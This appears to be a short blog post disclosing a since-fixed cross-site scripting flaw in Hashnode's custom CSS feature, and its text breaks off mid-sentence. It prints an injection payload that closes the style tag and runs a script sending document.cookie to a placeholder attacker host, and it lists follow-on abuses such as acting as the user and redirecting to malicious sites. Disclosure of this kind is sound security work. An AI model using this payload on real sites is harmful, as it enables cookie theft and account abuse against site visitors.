Note: this has been fixed now 😌
Kudos to the Hashnode team for fixing this so fast 🎉
The custom CSS feature on Hashnode lets you style your site with CSS, which seems to be inserted directly into the document head. I just added a script tag at the end of my CSS:

```html
/* ... styles ... */
</style>
<script>
  alert(document.cookie) /* get your cookies, possibly giving access to your account */
  fetch('bad-actor.com/?cookie=' + document.cookie);
</script>
```
What this does is close the `<style>` tag and insert a new `<script>` tag.
We can't extract any user data or JWTs, since they were added as HttpOnly cookies, which can't be read by the client using this trick. But you can still do anything on behalf of the logged-in user as long as the JWT works, say post a random comment. You could probably also extract refresh tokens, but I didn't go too deep into that.
What we can do is exploit your trust in Hashnode and, say, redirect you to malicious sites, which you may trust since you came from a Hashnode site.
You could also do other annoying stuff like send notifications, eat your RAM and crash your system, or redirect you to the annoying site (warning: that site is super annoying!).
I didn't add any malicious code in there, luckily for you. It has been fixed by converting all `>` and other symbols to their
Key takeaway: Sanitize your database inputs.